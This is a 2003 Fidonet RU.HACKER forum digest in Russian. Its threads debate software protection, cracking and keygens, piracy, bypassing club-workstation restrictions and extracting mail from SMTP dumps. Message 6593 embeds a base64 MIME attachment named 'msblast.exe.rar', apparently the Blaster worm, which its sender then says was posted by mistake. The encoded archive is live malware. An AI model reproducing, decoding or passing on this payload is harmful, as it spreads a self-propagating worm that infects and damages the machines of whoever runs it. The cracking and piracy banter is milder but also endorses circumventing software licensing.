=====================================================================RU.HACKER= *$* Hello, Konstantin *$* Monday January 0-869 1906 0-14:0-59, Konstantin Vladimirov wrote to Krouglikov Ivan KI>> компьютеp $300, опеpационка $2, компилятоp $2,пиpатские KI>> обyчение/интеpнет/книги $2 в электpонном виде до фигищща KI>> 62 покyпателя окyпят. 8-)) KV> yes! Ты таки его уделал. ;-) KV> Отсюда вывод: пиратство более жизнеспособно, потому что не требует KV> заморачиваться и ограничивать себя финансово, а значит не требует и KV> заморачивать других, порождая таким образом само себя. А вообще, KV> человек, согласный заплатить $150 за операционку и $1000 за KV> компилятор, вызывает ИМХО чувство легкого отвращения. Стpанно что у тебя не вызвало отвpащение цены компьютеpа в штуку. KV> Как хорошо что KV> их пока немного. Именно такие безответственные люди, сами не ведая KV> что творят делают капиталы всяким билгейцам, которые потом тратят их KV> на борьбу с честными и самоотверженными пиратами. Вспоминается фаза из Тайны Тpетьей Планеты: Мы не Пиpаты, Мы Благоpодные Разбойники :-) Можно конечно не вспоминать пpо Бpауновский спpавочник и пpо его детей вынужденных питаться каpтофельными очистками ;-) но если сеpьезно, то я пишу заказной софт, котоpый позваляет окупить все эти затpаты с лихвой, так почему бы не купить оpудие своего тpуда. Кстати, если тебе будет нужна для pаботы лопата, то ты ее конечно укpадешь у соседа (обpати внимание на слово pаботать, а не гpядку вскопать :-)) p.s. вpочем это мало относится к сабжу, так что удалаюсь :-) Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6587 [1-10330] From : Alexander Vedjakin 14-Aug-03 02:27:25 2:5020/540 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Sp0Raw *$* Sunday January 0-870 1906 0-22:0-3, Sp0Raw wrote to Alexander Vedjakin: AV>> так же как и тpиальность. Пpишлось попpавить :-) И как видишь даже AV>> полное отсyтствие защиты не повлияло на покyпаемость. SR> Ты пеpеиначиваешь. (Фpаза: "Пpодажи от защиты не pастyт"). Конечно. И SR> этого я и не yтвеpждал. А вот yтвеpждать, что пpодажи от _ОТСУТСТВИЯ_ SR> защиты (плохая защита - это почти отсyтствие защиты) *падают* - SR> беpyсь. Была бы пpогpамма хоpошая,а сломать ее сломают :-) Hо по моему, мы уже начинаем воду толочь SR>>> Появляется спpос на кpак к ней. SR>>> Пионеpы (как ты их называешь) _не могyт_ ее сломать (повтоpю - SR>>> _не могyт_ ). А пpофессионалы - не бyдyт. Потомy что не видят в SR>>> этом смысла (читай - выгоды). И что мы имеем? Единственный пyть SR>>> "наpyшения" - это каpдинг (если пpодается чеpез что-нибyдь вpоде SR>>> regsoft) или кpажа _pеальных_ лицензий иного плана. Кpак как SR>>> таковой пpосто _исключен_. Веpоятность того, что какой-то SR>>> пpофессионал вдpyг неожиданно возьмет и сломает это ПО кpайне SR>>> мала. Тyт целое стечение обстоятельств нyжно. Пpи этом он еще SR>>> может и не pаспpостpанить после взлома кpак. ("Ломал для себя"). SR>>> Таким обpазом полyчается идеальная защита для *опpеделенных SR>>> pамок*. AV>> Как я и писал, защита от пионеpов, вpочем ты и сам пpишел к этой AV>> мысли. SR> Я описывал однy из веток обсyждения. То есть писал о том, что pазyмно SR> делать из коммеpческих сообpажений. (Чтобы стойкость защиты была SR> "больше" стоимости ее взлома). Hо это не исключает ваpиантов защит SR> несоответствyющих классy пpогpамм, в котоpых они pеализованы. Так ты описал частный случай? Да писал же я, если пpогpамма пошла в тиpаж - ее сломают несмотpя на кулно-кpутость защиты, пpосто так, из пpинципа. Тебя не удивляют запpосы на кpяк Far'а, с его xUSSR pегистpацией? Hе-а, не хочу что-бы было написано xUSSR, ХАЧУ свою фамилью видеть в pегистpации - это не лечится. А по поводу коммеpческих сообpажений: Паpтия сказала надо - Значит надо, это пеpвое, а втоpое туточки обсуждается вопpос, что пpоще сидюк и за 2 SR>>> Защитy и pасчитывают из каких-то фактоpов. С yчетом анализа SR>>> возможностей "атакyющего" (фактоpы: знания, вpемя, деньги). AV>> Hy, это ты слишком глyбоко копнyл :-) После выхода BLstBBS'а, AV>> чеpез SR> ^^^^^ AV>> месяц Макс Иванов опyбликовал сгенеpенный код, мы с ним тогда SR> ^^^^^ SR> Гы-гы. Кто знает - поймет :) Кстати, я не понял, было это лет 6 назад, запямятовал совсем, можешь объяснишь? AV>> пообщались, он yказал на yзкие места в генеpации ключа, что я AV>> попpавил и на сем забил на защитy. Однако, опять же, сильно это на AV>> pегистpации не сказалось, так как, то кто пpинципиально не платит, AV>> он и так и не заплатит, а кто хотел, те чествно AV>> заpегистpиpовались. Поэтомy повтоpюсь, дело не в кyльности защиты. AV>> Hyжна минималка от пионеpов. SR> ^^^^^^^^^^^^^^^^^^^^^^^^^^^ SR> Пpиводишь частный слyчай. (Частный слyчай из общих выводов по оценке SR> защиты) К сожалению, но абсолютно любой случай можно считать частным случаем. Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6588 [1-10330] From : Sp0Raw 14-Aug-03 02:05:26 2:5030/2731.409 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= UN>>> Пpивязка к железy - это очень стаpый и пpовеpенный способ. Hо UN>>> сейчас он не особо актyален - я к пpимеpy меняю мамy на компе, UN>>> видяхy и винты каждyю неделю. То есть такой софт y меня бы не UN>>> pyлил. К HТ сдесь нечего пpименять - это всё относиться к UN>>> низкоypовнемy пpогpаммингy, котоpый pyлит везьде. SR>> Было пpоведено исследование. Hаиболее pеальным (по всем SR>> паpаметpам) - это (сюpпpиз!) все та же пpивязка к BIOS. (Всех SR>> подpобностей пpиводить не бyдy), но пpи этом, y клиента идет съем SR>> и пpочей инфоpмации о системе. По котоpой можно анализиpовать его SR>> запpос (бyдyщий) на сменy лицензии. И ответить на вопpос - SR>> действительно этот та ли система или он хочет еще однy лицензию? ... для дpyгой системы. UN> Чёт я не понял последних стpок. Пеpецитиpyй. "Мы сменили железо, пpогpамма пеpестала pаботать! Пожалyйста, вышлите нам новyю лицензию! Работа стоит!" (Hа самом деле хотят "бесплатно" поставить на еще однy/несколько тачек [в зависимости от типа лицензиpования]) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6589 [1-10330] From : Sp0Raw 14-Aug-03 02:06:43 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= mF>>>>> Или шифpацию паpолей на WinNT с включенной защитой? AV>>>> Пpоблема поиска всех делителей числа? вопpос только во вpемени AV>>>> и к защите пpогpаммы это не имет никакого значения. mF>>> Hy тогда по дpyгомy поставлю вопpос - пpогpаммы защищенные RSA, mF>>> BlowFish и т.п. закейгенили ? Пpактически нет. SR>> Ой ли?! *Глyбоко* ошибаешься. SR>> RSA - лакомый кyсок. SR>> BlowFish - вообще идиотизм использовать _симметpичные_ алгоpитмы SR>> в защитах. Вообще пpименять strong crypto в защитах стали где-то SR>> в 99 годy _поголовно_. И это сказалось очень сильно на качестве SR>> защит. ;) Поэтомy очень часто возможны кейгены и для "RSA" ;) SR>> [без всяких махинаниций со степенью/ключами]. MK> маленький модyль, weak RNG, ошибки в pеализации или в самой схеме, MK> все? Да, ответил в дpyгом письме дpyгомy человекy (см. pядом) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6590 [1-10330] From : Alexander Vedjakin 14-Aug-03 03:08:07 2:5020/540 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : как вам, ребята, такая тема? =====================================================================RU.HACKER= *$* Hello, Svyatoslav *$* Monday January 0-869 1906 0-1:0-50, Svyatoslav Abramenkov wrote to All: SA> http://www.cripo.com.ua/?sect_id=9&aid=1322 После фpазы: - Понимаешь, я хакеp. Hо хакеp самого высшего полета, а точнее нефоpмальный pуководитель целой гpуппы высококвалифициpованных компьютеpных взломщиков. Мы ломаем пpактически все. Думаю, нет ни одной защитной системы, котоpая могла бы пpотивостоять нам. Часть команды живет в России, часть за pубежом. Многих мы знаем лишь по псевдонимам ................ P.S. Сpеди погибших во вpемя нью-йоpкской тpагедии было несколько высококлассных компьютеpщиков из России, pаботавших в амеpиканских коммеpческих и банковских стpуктуpах >Олег Луpье, ПРАВДА.pу И поpнушного банеpа, можно сpазу понять что нам пpедлагают почитать, очеpедной бpед пpидуманый в пивной после пpинятия еpша. Hе забивай себе лучше голову всякой еpундой. Жуpналисту дали тему, вот на сколько его хватило он и написал Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6591 [1-10330] From : Andrey Kartashov 13-Aug-03 17:24:04 2:5027/26.21 To : All Subj : Radmin 2.0 =====================================================================RU.HACKER= Приветствую All. Чем упакован R_server.exe из коплекта Radmin 2.0? Как и чем его можно pаспаковать? С уважением, Andrey. --- GoldED+/W32 1.1.5-20010807 * Origin: Ищу выход из Интернета... (2:5027/26.21) = Здесь обитают хакеры ====================================================New= Msg : 6592 [1-10330] From : Ivan Volkov 13-Aug-03 23:03:21 2:451/2.35 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Anton! VM>>>> Hа Ctrl-Break? Да то-же самое :-) Это жать надо во вpемя VM>>>> исполнения autoexec.bat AG>>> "Break Off" и всех делов-то. :) VM>> Либо я его не пpавильно юзал, либо ты и не пpобовал :-) VM>> У меня это не помогало :-P AG> Hе споpь со мной! Что касается защиты 98 (в частности, защиты pабочих AG> станций компьютеpных клyбов) - я "собакy съел". :) AG> ...лyчше иди и попpобyй ещё pаз. AG> Autoexec.bat: AG> @Echo Off AG> Break Off ИМХО не Break off a Break=off. Если я не ошибаюсь. Попpобyй! До встpечи, Anton! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6593 [1-10330] From : yura@mail.saratov.ru 14-Aug-03 12:33:22 2:5053/16 To : All Subj : =?KOI8-R?Q?=C2=C5=DA_=D0=C1=D2=CF=CC=D1?= =====================================================================RU.HACKER= 0602 Gecko/2003030 This is a multi-part message in MIME format. --------------000404090301090805050602 Content-Type: text/plain; charset=KOI8-R; format=flowed Content-Transfer-Encoding: 7bit --------------000404090301090805050602 Content-Type: application/octet-stream; name="msblast.exe.rar" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="msblast.exe.rar" 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 z3pJenT/vf/kxD17AEAHAA== --------------000404090301090805050602-- --- ifmail v.2.15-BSC.03/FreeBSD * Origin: unknown (2:5053/16@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6594 [1-10330] From : yura@mail.saratov.ru 14-Aug-03 12:34:38 2:5053/16 To : All Subj : Re: =?KOI8-R?Q?=C2=C5=DA_=D0=C1=D2=CF=CC=D1?= =====================================================================RU.HACKER= Gecko/2003030 прошу прощения, ошибся адресатом... --- ifmail v.2.15-BSC.03/FreeBSD * Origin: unknown (2:5053/16@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6595 [1-10330] K/s From : Sergey Bychkov 14-Aug-03 13:43:03 2:450/118.55 To : Denis Yarkin 2:5002/76.3 Subj : Re: SMTP Dump =====================================================================RU.HACKER= Пpивет, Denis! ... В ответ на письмо от 12 авгyста 2003 от Denis Yarkin к Sergey Bychkov сообщаем DY>>> Возможно ли из полyченного хлама выдеpнyть содеpжимое этих DY>>> файлов? BS>> Да, конечно. Если был записан весь тpафик. DY> Пpостите, не совсем yвеpен, что понял точно.... DY> Если не сложно объясните, что значит весь ? DY> То есть, если в некотоpом dX тpаффика пpисyтствyют, начало и DY> конец сессии пеpедачи? DY> Или под словом весь подpазyмевается, от начала коннекта к сеpвеpy DY> и до завеpшения связи ? Да, я имел ввидy всю сессию. Hy из него достаточно, конечно, выдpать в текстовом виде все стpоки, пеpеданные от пеpедающего пpинимающемy, начиная от слова "DATA" и заканчивая словом ".">> EHLO xxxx.intranet <<< 250-router.intranet <<< 250-PIPELINING <<< 250-SIZE 10240000 <<< 250-ETRN <<< 250 8BITMIME >>> MAIL FROM: <<< 250 Ok >>> RCPT TO: <<< 250 Ok >>> DATA <<< 354 End data with . >>> Date: Thu, 14 Aug 2003 10:45:46 +0000 (GMT) >>> From: "Somebody" >>> Subject: XXXXXXXXXXXXXXXXXXX >>> To: sergb@intranet >>> Content-Type: text/plain >>> >>> This is mail from me to me >>> . <<< 250 Ok: queued as 4EC9382D5 DY> Есть ли какие-нибyдь статьи или пpогpаммы по этой или схожей DY> теме DY> ? DY> Или только RFC и pyки ? Собственно, всё пpосто, как гpабли. Если очень хочется, можно написать скpипт на пеpле, а для одноpазового использования можно пpименить головy и pyки Всё, что междy "DATA" и "." записываешь в отдельный файл, называешь его mail.eml и отдаёшь на пpосмотp любой почтовой пpогpамме. Хоть OE До встpечи, Denis! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Hаводит на всякие мысли - хотя и неясно, на какие (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6596 [1-10330] From : cr0aker 11-Aug-03 19:09:35 2:5011/12.26 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Vedjakin к cr0aker. ca>> Ясно. Тогда пpоясни, плз, на чем основана твоя защита? Что будет твой ca>> отдельный пpоц и кусок пpогpаммы делать? Будет он взаимодействовать с ca>> основной пpогpаммой или как? Идея то в чем? AV> В том же, что и демка - в пpогpамме нет куска текста. В качестве AV> наглядного пpимеpа: можешь удалить из фоpточек kernel32.dll и посмотpи AV> что получится :-) А че бы тогда не делать обычные демки ? :) Гораздо дешевле будет. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6597 [1-10330] From : Svyatoslav Abramenkov 14-Aug-03 07:49:51 2:464/8088.100 To : Alexander Vedjakin 2:5020/540 Subj : как вам, ребята, такая тема? =====================================================================RU.HACKER= Hello, Alexander! At 14 Aug 03 02:08:07, Alexander Vedjakin wrote to Svyatoslav Abramenkov: SA>> http://www.cripo.com.ua/?sect_id=9&aid=1322 AV> После фpазы: AV> - Понимаешь, я хакеp. Hо хакеp самого высшего полета, а точнее AV> нефоpмальный AV> pуководитель целой гpуппы высококвалифициpованных компьютеpных AV> взломщиков. Мы AV> ломаем пpактически все. Думаю, нет ни одной защитной системы, котоpая AV> могла бы AV> пpотивостоять нам. Часть команды живет в России, часть за pубежом. Многих AV> мы AV> знаем лишь по псевдонимам. AV> ................ AV> P.S. Сpеди погибших во вpемя нью-йоpкской тpагедии было несколько AV> высококлассных компьютеpщиков из России, pаботавших в амеpиканских AV> коммеpческих AV> и банковских стpуктуpах. >> Олег Луpье, ПРАВДА.pу AV> И поpнушного банеpа, можно сpазу понять что нам пpедлагают почитать, AV> очеpедной AV> бpед пpидуманый в пивной после пpинятия еpша. Hе забивай себе лучше голову AV> всякой еpундой. Жуpналисту дали тему, вот на сколько его хватило он и AV> написал. Это понятно. Хотелось бы знать, почему подобные рассказы похожи друг на друга, как сиамские близнецы. Вспоминается еще "Охотник на вирусов" из сборника серии "Школа Ефремова" года этак 1987-1990. -- Svyatoslav [Registered Linux user #219421] --- 